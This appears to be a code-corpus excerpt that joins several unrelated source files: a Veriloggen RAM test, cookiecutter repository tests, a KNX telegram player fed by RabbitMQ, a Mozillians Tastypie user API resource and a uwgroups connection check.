mem[379] = 32'hc780;
mem[380] = 32'hc800;
mem[381] = 32'hc880;
mem[382] = 32'hc900;
mem[383] = 32'hc980;
mem[384] = 32'hca00;
mem[385] = 32'hca80;
mem[386] = 32'hcb00;
mem[387] = 32'hcb80;
mem[388] = 32'hcc00;
mem[389] = 32'hcc80;
mem[390] = 32'hcd00;
mem[391] = 32'hcd80;
mem[392] = 32'hce00;
mem[393] = 32'hce80;
mem[394] = 32'hcf00;
mem[395] = 32'hcf80;
mem[396] = 32'hd000;
mem[397] = 32'hd080;
mem[398] = 32'hd100;
mem[399] = 32'hd180;
mem[400] = 32'hd200;
mem[401] = 32'hd280;
mem[402] = 32'hd300;
mem[403] = 32'hd380;
mem[404] = 32'hd400;
mem[405] = 32'hd480;
mem[406] = 32'hd500;
mem[407] = 32'hd580;
mem[408] = 32'hd600;
mem[409] = 32'hd680;
mem[410] = 32'hd700;
mem[411] = 32'hd780;
mem[412] = 32'hd800;
mem[413] = 32'hd880;
mem[414] = 32'hd900;
mem[415] = 32'hd980;
mem[416] = 32'hda00;
mem[417] = 32'hda80;
mem[418] = 32'hdb00;
mem[419] = 32'hdb80;
mem[420] = 32'hdc00;
mem[421] = 32'hdc80;
mem[422] = 32'hdd00;
mem[423] = 32'hdd80;
mem[424] = 32'hde00;
mem[425] = 32'hde80;
mem[426] = 32'hdf00;
mem[427] = 32'hdf80;
mem[428] = 32'he000;
mem[429] = 32'he080;
mem[430] = 32'he100;
mem[431] = 32'he180;
mem[432] = 32'he200;
mem[433] = 32'he280;
mem[434] = 32'he300;
mem[435] = 32'he380;
mem[436] = 32'he400;
mem[437] = 32'he480;
mem[438] = 32'he500;
mem[439] = 32'he580;
mem[440] = 32'he600;
mem[441] = 32'he680;
mem[442] = 32'he700;
mem[443] = 32'he780;
mem[444] = 32'he800;
mem[445] = 32'he880;
mem[446] = 32'he900;
mem[447] = 32'he980;
mem[448] = 32'hea00;
mem[449] = 32'hea80;
mem[450] = 32'heb00;
mem[451] = 32'heb80;
mem[452] = 32'hec00;
mem[453] = 32'hec80;
mem[454] = 32'hed00;
mem[455] = 32'hed80;
mem[456] = 32'hee00;
mem[457] = 32'hee80;
mem[458] = 32'hef00;
mem[459] = 32'hef80;
mem[460] = 32'hf000;
mem[461] = 32'hf080;
mem[462] = 32'hf100;
mem[463] = 32'hf180;
mem[464] = 32'hf200;
mem[465] = 32'hf280;
mem[466] = 32'hf300;
mem[467] = 32'hf380;
mem[468] = 32'hf400;
mem[469] = 32'hf480;
mem[470] = 32'hf500;
mem[471] = 32'hf580;
mem[472] = 32'hf600;
mem[473] = 32'hf680;
mem[474] = 32'hf700;
mem[475] = 32'hf780;
mem[476] = 32'hf800;
mem[477] = 32'hf880;
mem[478] = 32'hf900;
mem[479] = 32'hf980;
mem[480] = 32'hfa00;
mem[481] = 32'hfa80;
mem[482] = 32'hfb00;
mem[483] = 32'hfb80;
mem[484] = 32'hfc00;
mem[485] = 32'hfc80;
mem[486] = 32'hfd00;
mem[487] = 32'hfd80;
mem[488] = 32'hfe00;
mem[489] = 32'hfe80;
mem[490] = 32'hff00;
mem[491] = 32'hff80;
mem[492] = 32'h10000;
mem[493] = 32'h10080;
mem[494] = 32'h10100;
mem[495] = 32'h10180;
mem[496] = 32'h10200;
mem[497] = 32'h10280;
mem[498] = 32'h10300;
mem[499] = 32'h10380;
mem[500] = 32'h10400;
mem[501] = 32'h10480;
mem[502] = 32'h10500;
mem[503] = 32'h10580;
mem[504] = 32'h10600;
mem[505] = 32'h10680;
mem[506] = 32'h10700;
mem[507] = 32'h10780;
mem[508] = 32'h10800;
mem[509] = 32'h10880;
mem[510] = 32'h10900;
mem[511] = 32'h10980;
mem[512] = 32'h10a00;
mem[513] = 32'h10a80;
mem[514] = 32'h10b00;
mem[515] = 32'h10b80;
mem[516] = 32'h10c00;
mem[517] = 32'h10c80;
mem[518] = 32'h10d00;
mem[519] = 32'h10d80;
mem[520] = 32'h10e00;
mem[521] = 32'h10e80;
mem[522] = 32'h10f00;
mem[523] = 32'h10f80;
mem[524] = 32'h11000;
mem[525] = 32'h11080;
mem[526] = 32'h11100;
mem[527] = 32'h11180;
mem[528] = 32'h11200;
mem[529] = 32'h11280;
mem[530] = 32'h11300;
mem[531] = 32'h11380;
mem[532] = 32'h11400;
mem[533] = 32'h11480;
mem[534] = 32'h11500;
mem[535] = 32'h11580;
mem[536] = 32'h11600;
mem[537] = 32'h11680;
mem[538] = 32'h11700;
mem[539] = 32'h11780;
mem[540] = 32'h11800;
mem[541] = 32'h11880;
mem[542] = 32'h11900;
mem[543] = 32'h11980;
mem[544] = 32'h11a00;
mem[545] = 32'h11a80;
mem[546] = 32'h11b00;
mem[547] = 32'h11b80;
mem[548] = 32'h11c00;
mem[549] = 32'h11c80;
mem[550] = 32'h11d00;
mem[551] = 32'h11d80;
mem[552] = 32'h11e00;
mem[553] = 32'h11e80;
mem[554] = 32'h11f00;
mem[555] = 32'h11f80;
mem[556] = 32'h12000;
mem[557] = 32'h12080;
mem[558] = 32'h12100;
mem[559] = 32'h12180;
mem[560] = 32'h12200;
mem[561] = 32'h12280;
mem[562] = 32'h12300;
mem[563] = 32'h12380;
mem[564] = 32'h12400;
mem[565] = 32'h12480;
mem[566] = 32'h12500;
mem[567] = 32'h12580;
mem[568] = 32'h12600;
mem[569] = 32'h12680;
mem[570] = 32'h12700;
mem[571] = 32'h12780;
mem[572] = 32'h12800;
mem[573] = 32'h12880;
mem[574] = 32'h12900;
mem[575] = 32'h12980;
mem[576] = 32'h12a00;
mem[577] = 32'h12a80;
mem[578] = 32'h12b00;
mem[579] = 32'h12b80;
mem[580] = 32'h12c00;
mem[581] = 32'h12c80;
mem[582] = 32'h12d00;
mem[583] = 32'h12d80;
mem[584] = 32'h12e00;
mem[585] = 32'h12e80;
mem[586] = 32'h12f00;
mem[587] = 32'h12f80;
mem[588] = 32'h13000;
mem[589] = 32'h13080;
mem[590] = 32'h13100;
mem[591] = 32'h13180;
mem[592] = 32'h13200;
mem[593] = 32'h13280;
mem[594] = 32'h13300;
mem[595] = 32'h13380;
mem[596] = 32'h13400;
mem[597] = 32'h13480;
mem[598] = 32'h13500;
mem[599] = 32'h13580;
mem[600] = 32'h13600;
mem[601] = 32'h13680;
mem[602] = 32'h13700;
mem[603] = 32'h13780;
mem[604] = 32'h13800;
mem[605] = 32'h13880;
mem[606] = 32'h13900;
mem[607] = 32'h13980;
mem[608] = 32'h13a00;
mem[609] = 32'h13a80;
mem[610] = 32'h13b00;
mem[611] = 32'h13b80;
mem[612] = 32'h13c00;
mem[613] = 32'h13c80;
mem[614] = 32'h13d00;
mem[615] = 32'h13d80;
mem[616] = 32'h13e00;
mem[617] = 32'h13e80;
mem[618] = 32'h13f00;
mem[619] = 32'h13f80;
mem[620] = 32'h14000;
mem[621] = 32'h14080;
mem[622] = 32'h14100;
mem[623] = 32'h14180;
mem[624] = 32'h14200;
mem[625] = 32'h14280;
mem[626] = 32'h14300;
mem[627] = 32'h14380;
mem[628] = 32'h14400;
mem[629] = 32'h14480;
mem[630] = 32'h14500;
mem[631] = 32'h14580;
mem[632] = 32'h14600;
mem[633] = 32'h14680;
mem[634] = 32'h14700;
mem[635] = 32'h14780;
mem[636] = 32'h14800;
mem[637] = 32'h14880;
mem[638] = 32'h14900;
mem[639] = 32'h14980;
mem[640] = 32'h14a00;
mem[641] = 32'h14a80;
mem[642] = 32'h14b00;
mem[643] = 32'h14b80;
mem[644] = 32'h14c00;
mem[645] = 32'h14c80;
mem[646] = 32'h14d00;
mem[647] = 32'h14d80;
mem[648] = 32'h14e00;
mem[649] = 32'h14e80;
mem[650] = 32'h14f00;
mem[651] = 32'h14f80;
mem[652] = 32'h15000;
mem[653] = 32'h15080;
mem[654] = 32'h15100;
mem[655] = 32'h15180;
mem[656] = 32'h15200;
mem[657] = 32'h15280;
mem[658] = 32'h15300;
mem[659] = 32'h15380;
mem[660] = 32'h15400;
mem[661] = 32'h15480;
mem[662] = 32'h15500;
mem[663] = 32'h15580;
mem[664] = 32'h15600;
mem[665] = 32'h15680;
mem[666] = 32'h15700;
mem[667] = 32'h15780;
mem[668] = 32'h15800;
mem[669] = 32'h15880;
mem[670] = 32'h15900;
mem[671] = 32'h15980;
mem[672] = 32'h15a00;
mem[673] = 32'h15a80;
mem[674] = 32'h15b00;
mem[675] = 32'h15b80;
mem[676] = 32'h15c00;
mem[677] = 32'h15c80;
mem[678] = 32'h15d00;
mem[679] = 32'h15d80;
mem[680] = 32'h15e00;
mem[681] = 32'h15e80;
mem[682] = 32'h15f00;
mem[683] = 32'h15f80;
mem[684] = 32'h16000;
mem[685] = 32'h16080;
mem[686] = 32'h16100;
mem[687] = 32'h16180;
mem[688] = 32'h16200;
mem[689] = 32'h16280;
mem[690] = 32'h16300;
mem[691] = 32'h16380;
mem[692] = 32'h16400;
mem[693] = 32'h16480;
mem[694] = 32'h16500;
mem[695] = 32'h16580;
mem[696] = 32'h16600;
mem[697] = 32'h16680;
mem[698] = 32'h16700;
mem[699] = 32'h16780;
mem[700] = 32'h16800;
mem[701] = 32'h16880;
mem[702] = 32'h16900;
mem[703] = 32'h16980;
mem[704] = 32'h16a00;
mem[705] = 32'h16a80;
mem[706] = 32'h16b00;
mem[707] = 32'h16b80;
mem[708] = 32'h16c00;
mem[709] = 32'h16c80;
mem[710] = 32'h16d00;
mem[711] = 32'h16d80;
mem[712] = 32'h16e00;
mem[713] = 32'h16e80;
mem[714] = 32'h16f00;
mem[715] = 32'h16f80;
mem[716] = 32'h17000;
mem[717] = 32'h17080;
mem[718] = 32'h17100;
mem[719] = 32'h17180;
mem[720] = 32'h17200;
mem[721] = 32'h17280;
mem[722] = 32'h17300;
mem[723] = 32'h17380;
mem[724] = 32'h17400;
mem[725] = 32'h17480;
mem[726] = 32'h17500;
mem[727] = 32'h17580;
mem[728] = 32'h17600;
mem[729] = 32'h17680;
mem[730] = 32'h17700;
mem[731] = 32'h17780;
mem[732] = 32'h17800;
mem[733] = 32'h17880;
mem[734] = 32'h17900;
mem[735] = 32'h17980;
mem[736] = 32'h17a00;
mem[737] = 32'h17a80;
mem[738] = 32'h17b00;
mem[739] = 32'h17b80;
mem[740] = 32'h17c00;
mem[741] = 32'h17c80;
mem[742] = 32'h17d00;
mem[743] = 32'h17d80;
mem[744] = 32'h17e00;
mem[745] = 32'h17e80;
mem[746] = 32'h17f00;
mem[747] = 32'h17f80;
mem[748] = 32'h18000;
mem[749] = 32'h18080;
mem[750] = 32'h18100;
mem[751] = 32'h18180;
mem[752] = 32'h18200;
mem[753] = 32'h18280;
mem[754] = 32'h18300;
mem[755] = 32'h18380;
mem[756] = 32'h18400;
mem[757] = 32'h18480;
mem[758] = 32'h18500;
mem[759] = 32'h18580;
mem[760] = 32'h18600;
mem[761] = 32'h18680;
mem[762] = 32'h18700;
mem[763] = 32'h18780;
mem[764] = 32'h18800;
mem[765] = 32'h18880;
mem[766] = 32'h18900;
mem[767] = 32'h18980;
mem[768] = 32'h18a00;
mem[769] = 32'h18a80;
mem[770] = 32'h18b00;
mem[771] = 32'h18b80;
mem[772] = 32'h18c00;
mem[773] = 32'h18c80;
mem[774] = 32'h18d00;
mem[775] = 32'h18d80;
mem[776] = 32'h18e00;
mem[777] = 32'h18e80;
mem[778] = 32'h18f00;
mem[779] = 32'h18f80;
mem[780] = 32'h19000;
mem[781] = 32'h19080;
mem[782] = 32'h19100;
mem[783] = 32'h19180;
mem[784] = 32'h19200;
mem[785] = 32'h19280;
mem[786] = 32'h19300;
mem[787] = 32'h19380;
mem[788] = 32'h19400;
mem[789] = 32'h19480;
mem[790] = 32'h19500;
mem[791] = 32'h19580;
mem[792] = 32'h19600;
mem[793] = 32'h19680;
mem[794] = 32'h19700;
mem[795] = 32'h19780;
mem[796] = 32'h19800;
mem[797] = 32'h19880;
mem[798] = 32'h19900;
mem[799] = 32'h19980;
mem[800] = 32'h19a00;
mem[801] = 32'h19a80;
mem[802] = 32'h19b00;
mem[803] = 32'h19b80;
mem[804] = 32'h19c00;
mem[805] = 32'h19c80;
mem[806] = 32'h19d00;
mem[807] = 32'h19d80;
mem[808] = 32'h19e00;
mem[809] = 32'h19e80;
mem[810] = 32'h19f00;
mem[811] = 32'h19f80;
mem[812] = 32'h1a000;
mem[813] = 32'h1a080;
mem[814] = 32'h1a100;
mem[815] = 32'h1a180;
mem[816] = 32'h1a200;
mem[817] = 32'h1a280;
mem[818] = 32'h1a300;
mem[819] = 32'h1a380;
mem[820] = 32'h1a400;
mem[821] = 32'h1a480;
mem[822] = 32'h1a500;
mem[823] = 32'h1a580;
mem[824] = 32'h1a600;
mem[825] = 32'h1a680;
mem[826] = 32'h1a700;
mem[827] = 32'h1a780;
mem[828] = 32'h1a800;
mem[829] = 32'h1a880;
mem[830] = 32'h1a900;
mem[831] = 32'h1a980;
mem[832] = 32'h1aa00;
mem[833] = 32'h1aa80;
mem[834] = 32'h1ab00;
mem[835] = 32'h1ab80;
mem[836] = 32'h1ac00;
mem[837] = 32'h1ac80;
mem[838] = 32'h1ad00;
mem[839] = 32'h1ad80;
mem[840] = 32'h1ae00;
mem[841] = 32'h1ae80;
mem[842] = 32'h1af00;
mem[843] = 32'h1af80;
mem[844] = 32'h1b000;
mem[845] = 32'h1b080;
mem[846] = 32'h1b100;
mem[847] = 32'h1b180;
mem[848] = 32'h1b200;
mem[849] = 32'h1b280;
mem[850] = 32'h1b300;
mem[851] = 32'h1b380;
mem[852] = 32'h1b400;
mem[853] = 32'h1b480;
mem[854] = 32'h1b500;
mem[855] = 32'h1b580;
mem[856] = 32'h1b600;
mem[857] = 32'h1b680;
mem[858] = 32'h1b700;
mem[859] = 32'h1b780;
mem[860] = 32'h1b800;
mem[861] = 32'h1b880;
mem[862] = 32'h1b900;
mem[863] = 32'h1b980;
mem[864] = 32'h1ba00;
mem[865] = 32'h1ba80;
mem[866] = 32'h1bb00;
mem[867] = 32'h1bb80;
mem[868] = 32'h1bc00;
mem[869] = 32'h1bc80;
mem[870] = 32'h1bd00;
mem[871] = 32'h1bd80;
mem[872] = 32'h1be00;
mem[873] = 32'h1be80;
mem[874] = 32'h1bf00;
mem[875] = 32'h1bf80;
mem[876] = 32'h1c000;
mem[877] = 32'h1c080;
mem[878] = 32'h1c100;
mem[879] = 32'h1c180;
mem[880] = 32'h1c200;
mem[881] = 32'h1c280;
mem[882] = 32'h1c300;
mem[883] = 32'h1c380;
mem[884] = 32'h1c400;
mem[885] = 32'h1c480;
mem[886] = 32'h1c500;
mem[887] = 32'h1c580;
mem[888] = 32'h1c600;
mem[889] = 32'h1c680;
mem[890] = 32'h1c700;
mem[891] = 32'h1c780;
mem[892] = 32'h1c800;
mem[893] = 32'h1c880;
mem[894] = 32'h1c900;
mem[895] = 32'h1c980;
mem[896] = 32'h1ca00;
mem[897] = 32'h1ca80;
mem[898] = 32'h1cb00;
mem[899] = 32'h1cb80;
mem[900] = 32'h1cc00;
mem[901] = 32'h1cc80;
mem[902] = 32'h1cd00;
mem[903] = 32'h1cd80;
mem[904] = 32'h1ce00;
mem[905] = 32'h1ce80;
mem[906] = 32'h1cf00;
mem[907] = 32'h1cf80;
mem[908] = 32'h1d000;
mem[909] = 32'h1d080;
mem[910] = 32'h1d100;
mem[911] = 32'h1d180;
mem[912] = 32'h1d200;
mem[913] = 32'h1d280;
mem[914] = 32'h1d300;
mem[915] = 32'h1d380;
mem[916] = 32'h1d400;
mem[917] = 32'h1d480;
mem[918] = 32'h1d500;
mem[919] = 32'h1d580;
mem[920] = 32'h1d600;
mem[921] = 32'h1d680;
mem[922] = 32'h1d700;
mem[923] = 32'h1d780;
mem[924] = 32'h0;
mem[925] = 32'h0;
mem[926] = 32'h0;
mem[927] = 32'h0;
mem[928] = 32'h0;
mem[929] = 32'h0;
mem[930] = 32'h0;
mem[931] = 32'h0;
mem[932] = 32'h0;
mem[933] = 32'h0;
mem[934] = 32'h0;
mem[935] = 32'h0;
mem[936] = 32'h0;
mem[937] = 32'h0;
mem[938] = 32'h0;
mem[939] = 32'h0;
mem[940] = 32'h0;
mem[941] = 32'h0;
mem[942] = 32'h0;
mem[943] = 32'h0;
mem[944] = 32'h0;
mem[945] = 32'h0;
mem[946] = 32'h0;
mem[947] = 32'h0;
mem[948] = 32'h0;
mem[949] = 32'h0;
mem[950] = 32'h0;
mem[951] = 32'h0;
mem[952] = 32'h0;
mem[953] = 32'h0;
mem[954] = 32'h0;
mem[955] = 32'h0;
mem[956] = 32'h0;
mem[957] = 32'h0;
mem[958] = 32'h0;
mem[959] = 32'h0;
mem[960] = 32'h0;
mem[961] = 32'h0;
mem[962] = 32'h0;
mem[963] = 32'h0;
mem[964] = 32'h0;
mem[965] = 32'h0;
mem[966] = 32'h0;
mem[967] = 32'h0;
mem[968] = 32'h0;
mem[969] = 32'h0;
mem[970] = 32'h0;
mem[971] = 32'h0;
mem[972] = 32'h0;
mem[973] = 32'h0;
mem[974] = 32'h0;
mem[975] = 32'h0;
mem[976] = 32'h0;
mem[977] = 32'h0;
mem[978] = 32'h0;
mem[979] = 32'h0;
mem[980] = 32'h0;
mem[981] = 32'h0;
mem[982] = 32'h0;
mem[983] = 32'h0;
mem[984] = 32'h0;
mem[985] = 32'h0;
mem[986] = 32'h0;
mem[987] = 32'h0;
mem[988] = 32'h0;
mem[989] = 32'h0;
mem[990] = 32'h0;
mem[991] = 32'h0;
mem[992] = 32'h0;
mem[993] = 32'h0;
mem[994] = 32'h0;
mem[995] = 32'h0;
mem[996] = 32'h0;
mem[997] = 32'h0;
mem[998] = 32'h0;
mem[999] = 32'h0;
mem[1000] = 32'h0;
mem[1001] = 32'h0;
mem[1002] = 32'h0;
mem[1003] = 32'h0;
mem[1004] = 32'h0;
mem[1005] = 32'h0;
mem[1006] = 32'h0;
mem[1007] = 32'h0;
mem[1008] = 32'h0;
mem[1009] = 32'h0;
mem[1010] = 32'h0;
mem[1011] = 32'h0;
mem[1012] = 32'h0;
mem[1013] = 32'h0;
mem[1014] = 32'h0;
mem[1015] = 32'h0;
mem[1016] = 32'h0;
mem[1017] = 32'h0;
mem[1018] = 32'h0;
mem[1019] = 32'h0;
mem[1020] = 32'h0;
mem[1021] = 32'h0;
mem[1022] = 32'h0;
mem[1023] = 32'h0;
end
always @(posedge CLK) begin
if(myram_0_wenable) begin
mem[myram_0_addr] <= myram_0_wdata;
end
myram_0_daddr <= myram_0_addr;
end
assign myram_0_rdata = mem[myram_0_daddr];
endmodule
"""
def test():
veriloggen.reset()
test_module = thread_fixed_ram_initvals.mkTest()
code = test_module.to_verilog()
from pyverilog.vparser.parser import VerilogParser
from pyverilog.ast_code_generator.codegen import ASTCodeGenerator
parser = VerilogParser()
expected_ast = parser.parse(expected_verilog)
codegen = ASTCodeGenerator()
expected_code = codegen.visit(expected_ast)
assert(expected_code == code)
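
# Optional entry point (added; not part of the original test file) so the
# regression can also be run directly as a script in addition to pytest.
if __name__ == '__main__':
    test()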
|
StarcoderdataPython
|
9635427
|
"""Tests for `repository_has_cookiecutter_json` function."""
import pytest
from cookiecutter.repository import repository_has_cookiecutter_json
def test_valid_repository():
"""Validate correct response if `cookiecutter.json` file exist."""
assert repository_has_cookiecutter_json('tests/fixtures/fake-repo')
@pytest.mark.parametrize(
'invalid_repository', (['tests/fixtures/fake-repo-bad', 'tests/unknown-repo'])
)
def test_invalid_repository(invalid_repository):
"""Validate correct response if `cookiecutter.json` file not exist."""
assert not repository_has_cookiecutter_json(invalid_repository)
@pytest.mark.parametrize(
'valid_repository',
(['tests/fixtures/valid/nuki-input', 'tests/fixtures/valid/yaml-input']),
)
def test_valid_repositories_yaml_nuki(valid_repository):
"""Validate generic reader works properly."""
assert repository_has_cookiecutter_json(valid_repository)
|
StarcoderdataPython
|
176505
|
<filename>player.py
#!/usr/bin/env python3
import argparse
from datetime import datetime
import json
from ctypes import CDLL, CFUNCTYPE, POINTER, c_int, c_void_p, c_uint, c_ubyte, pointer, create_string_buffer
import pika
from src.telegram import Telegram
ARGS = argparse.ArgumentParser(description="Sends received messages on the KNX bus. If the argument 'device' is missing, debug mode is used: no telegrams are sent to the KNX bus, they are only written to stdout.",
                               formatter_class=argparse.ArgumentDefaultsHelpFormatter)
ARGS.add_argument('-p', '--player', action='store', dest='player_id', type=int, help='player id', required=True)
ARGS.add_argument('-q', '--queue', action='store', dest='queue_ip', type=str, help='queue ip', required=True)
ARGS.add_argument('-d', '--device', action='store', dest='device_index', type=int, help='device index (usually 0)', required=False)
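# Illustrative invocation (added; the player id, queue IP and device index are
# assumptions, not values from the original project):
#   python3 player.py --player 1 --queue 192.168.0.10 --device 0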
kdrive = CDLL('/usr/local/lib/libkdriveExpress.so')
DEBUG = False
# the error callback pointer to function type
ERROR_CALLBACK = CFUNCTYPE(None, c_int, c_void_p)
# the event callback pointer to function type
EVENT_CALLBACK = CFUNCTYPE(None, c_int, c_uint, c_void_p)
# acccess port descriptor
ap = None
def telegram_received(channel, method, properties, body):
t = Telegram(**json.loads(body.decode('ascii')))
cemi = bytes(t.pack())
timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f")
print("{0} {1}".format(timestamp, cemi.hex()))
# cemi= b'\x11\x00\xBC\xE0\x35\x25\x12\x04\x01\x00\x81'
if not DEBUG:
kdrive.kdrive_ap_send(ap, cemi, len(cemi))
def main():
global ap, DEBUG
args = ARGS.parse_args()
print("Starting traffic-player using player id {0}".format(args.player_id))
DEBUG = args.device_index is None
if not DEBUG:
print("Starting live mode...")
start_live_mode(args)
else:
print("No device index given, starting debug mode...")
start_debug_mode(args)
def start_live_mode(args):
global ap
# Configure the logging level
kdrive.kdrive_logger_set_level(0)
# We register an error callback as a convenience logger function to
# print out the error message when an error occurs.
error_callback = ERROR_CALLBACK(on_error_callback)
kdrive.kdrive_register_error_callback(error_callback, None)
# We create a Access Port descriptor. This descriptor is then used for
# all calls to that specific access port.
ap = kdrive.kdrive_ap_create()
# We check that we were able to allocate a new descriptor
# This should always happen, unless a bad_alloc exception is internally thrown
# which means the memory couldn't be allocated.
if ap == -1:
print('Unable to create access port')
return
# We register an event callback to notify of the Access Port Events
# For example: KDRIVE_EVENT_TERMINATED
event_callback = EVENT_CALLBACK(on_event_callback)
kdrive.kdrive_set_event_callback(ap, event_callback, None)
iface_count = kdrive.kdrive_ap_enum_usb(ap)
print('Found {0} KNX USB Interfaces'.format(iface_count))
if ((iface_count > 0) and (kdrive.kdrive_ap_open_usb(ap, args.device_index) == 0)):
print("Using device with index {0}".format(args.device_index))
# Connect the Packet Trace logging mechanism to see the Rx and Tx packets
# kdrive.kdrive_ap_packet_trace_connect(ap)
try:
connection = pika.BlockingConnection(pika.ConnectionParameters(args.queue_ip))
channel = connection.channel()
name = 'traffic-player-{0}'.format(args.player_id)
channel.queue_declare(queue=name)
channel.basic_consume(name, telegram_received, auto_ack=True)
print('Waiting for messages. To exit press CTRL+C')
channel.start_consuming()
except KeyboardInterrupt:
channel.stop_consuming()
finally:
# close the access port
kdrive.kdrive_ap_close(ap)
# close the connection
connection.close()
else:
print('No KNX USB Interfaces found, exiting...')
# releases the access port
kdrive.kdrive_ap_release(ap)
def start_debug_mode(args):
try:
connection = pika.BlockingConnection(pika.ConnectionParameters(args.queue_ip))
channel = connection.channel()
name = 'traffic-player-{0}'.format(args.player_id)
channel.queue_declare(queue=name)
channel.basic_consume(name, telegram_received, auto_ack=True)
print('Waiting for messages. To exit press CTRL+C')
channel.start_consuming()
except KeyboardInterrupt:
channel.stop_consuming()
finally:
# close the connection
connection.close()
def on_error_callback(e, user_data):
    # use local names that do not shadow the built-ins `len` and `str`
    buf_len = 1024
    buf = create_string_buffer(buf_len)
    kdrive.kdrive_get_error_message(e, buf, buf_len)
    print('kdrive error {0} {1}'.format(hex(e), buf.value))
def on_event_callback(ap, e, user_data):
pass
if __name__ == '__main__':
main()
|
StarcoderdataPython
|
9731114
|
from urllib2 import unquote
from urlparse import urljoin
from django.conf import settings
from django.core.urlresolvers import reverse
from django.db.models import Q
from funfactory import utils
from tastypie import fields, http
from tastypie.authorization import ReadOnlyAuthorization
from tastypie.bundle import Bundle
from tastypie.exceptions import ImmediateHttpResponse
from tastypie.resources import ModelResource
from tastypie.serializers import Serializer
from mozillians.api.v1.authenticators import AppAuthentication
from mozillians.api.v1.paginator import Paginator
from mozillians.api.v1.resources import (ClientCacheResourceMixIn,
GraphiteMixIn)
from mozillians.users.models import GroupMembership, UserProfile
class UserResource(ClientCacheResourceMixIn, GraphiteMixIn, ModelResource):
"""User Resource."""
email = fields.CharField(attribute='user__email', null=True, readonly=True)
username = fields.CharField(attribute='user__username', null=True, readonly=True)
vouched_by = fields.IntegerField(attribute='vouched_by__id',
null=True, readonly=True)
date_vouched = fields.DateTimeField(attribute='date_vouched', null=True, readonly=True)
groups = fields.CharField()
skills = fields.CharField()
languages = fields.CharField()
url = fields.CharField()
accounts = fields.CharField()
city = fields.CharField(attribute='geo_city__name', null=True, readonly=True, default='')
region = fields.CharField(attribute='geo_region__name', null=True, readonly=True, default='')
country = fields.CharField(attribute='geo_country__code', null=True, readonly=True, default='')
photo_thumbnail = fields.CharField()
class Meta:
queryset = UserProfile.objects.all()
authentication = AppAuthentication()
authorization = ReadOnlyAuthorization()
serializer = Serializer(formats=['json', 'jsonp'])
paginator_class = Paginator
cache_control = {'max-age': 0}
list_allowed_methods = ['get']
detail_allowed_methods = ['get']
resource_name = 'users'
restrict_fields = False
restricted_fields = ['email', 'is_vouched']
fields = ['id', 'full_name', 'is_vouched', 'vouched_by',
'date_vouched', 'groups', 'skills',
'bio', 'photo', 'ircname', 'country', 'region', 'city',
'date_mozillian', 'timezone', 'email', 'allows_mozilla_sites',
'allows_community_sites']
def build_filters(self, filters=None):
database_filters = {}
valid_filters = [f for f in filters if f in
['email', 'country', 'region', 'city', 'ircname',
'username', 'groups', 'skills',
'is_vouched', 'name', 'accounts']]
getvalue = lambda x: unquote(filters[x].lower())
if 'accounts' in valid_filters:
database_filters['accounts'] = Q(
externalaccount__identifier__icontains=getvalue('accounts'))
if 'email' in valid_filters:
database_filters['email'] = Q(
user__email__iexact=getvalue('email'))
if 'username' in valid_filters:
database_filters['username'] = Q(
user__username__iexact=getvalue('username'))
if 'name' in valid_filters:
database_filters['name'] = Q(full_name__iexact=getvalue('name'))
if 'is_vouched' in valid_filters:
value = getvalue('is_vouched')
if value == 'true':
database_filters['is_vouched'] = Q(is_vouched=True)
elif value == 'false':
database_filters['is_vouched'] = Q(is_vouched=False)
if 'country' in valid_filters:
database_filters['country'] = Q(geo_country__code=getvalue('country'))
if 'region' in valid_filters:
database_filters['region'] = Q(geo_region__name=getvalue('region'))
if 'city' in valid_filters:
database_filters['city'] = Q(geo_city__name=getvalue('city'))
if 'ircname' in valid_filters:
database_filters['ircname'] = Q(
**{'{0}__iexact'.format('ircname'):
getvalue('ircname')})
if 'groups' in valid_filters:
kwargs = {
'groups__name__in': getvalue('groups').split(','),
'groupmembership__status': GroupMembership.MEMBER
}
database_filters['groups'] = Q(**kwargs)
if 'skills' in valid_filters:
database_filters['skills'] = Q(skills__name__in=getvalue('skills').split(','))
return database_filters
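
    # Illustrative mapping (added; the query below is an assumption, not from
    # the original source):
    #   GET /api/v1/users/?country=gr&is_vouched=true
    #   -> {'country': Q(geo_country__code='gr'),
    #       'is_vouched': Q(is_vouched=True)}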
def dehydrate(self, bundle):
if (bundle.request.GET.get('restricted', False)
or not bundle.data['allows_mozilla_sites']):
data = {}
for key in self._meta.restricted_fields:
data[key] = bundle.data[key]
bundle = Bundle(obj=bundle.obj, data=data, request=bundle.request)
return bundle
def dehydrate_accounts(self, bundle):
accounts = [{'identifier': a.identifier, 'type': a.type}
for a in bundle.obj.externalaccount_set.all()]
return accounts
def dehydrate_groups(self, bundle):
groups = bundle.obj.groups.values_list('name', flat=True)
return list(groups)
def dehydrate_skills(self, bundle):
skills = bundle.obj.skills.values_list('name', flat=True)
return list(skills)
def dehydrate_languages(self, bundle):
languages = bundle.obj.languages.values_list('code', flat=True)
return list(languages)
def dehydrate_photo(self, bundle):
if bundle.obj.photo:
return urljoin(settings.SITE_URL, bundle.obj.photo.url)
return ''
def dehydrate_photo_thumbnail(self, bundle):
return urljoin(settings.SITE_URL, bundle.obj.get_photo_url())
def dehydrate_url(self, bundle):
url = reverse('phonebook:profile_view',
args=[bundle.obj.user.username])
return utils.absolutify(url)
def get_detail(self, request, **kwargs):
if request.GET.get('restricted', False):
raise ImmediateHttpResponse(response=http.HttpForbidden())
return super(UserResource, self).get_detail(request, **kwargs)
def apply_filters(self, request, applicable_filters):
if (request.GET.get('restricted', False)
and 'email' not in applicable_filters
and len(applicable_filters) != 1):
raise ImmediateHttpResponse(response=http.HttpForbidden())
mega_filter = Q()
for db_filter in applicable_filters.values():
mega_filter &= db_filter
if request.GET.get('restricted', False):
mega_filter &= Q(allows_community_sites=True)
return UserProfile.objects.complete().filter(mega_filter).distinct().order_by('id')
|
StarcoderdataPython
|
3404849
|
<reponame>nhoffman/uwgroups
"""Create a connection - useful mainly for testing credentials
"""
import logging
from uwgroups.api import UWGroups
from uwgroups.subcommands import find_credentials
log = logging.getLogger(__name__)
def build_parser(parser):
pass
def action(args):
certfile, keyfile = find_credentials(args)
with UWGroups(certfile, keyfile, environment=args.environment) as conn:
for attr in ['host', 'port']:
print(('{}: {}'.format(attr, getattr(conn.connection, attr))))
for attr in ['certfile', 'keyfile']:
print(('{}: {}'.format(attr, getattr(conn, attr))))
print(('admin users defined by cert: {}'.format(conn.admins)))
print('ok')
|
StarcoderdataPython
|
8010147
|
# Copyright 2021 The TensorFlow Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
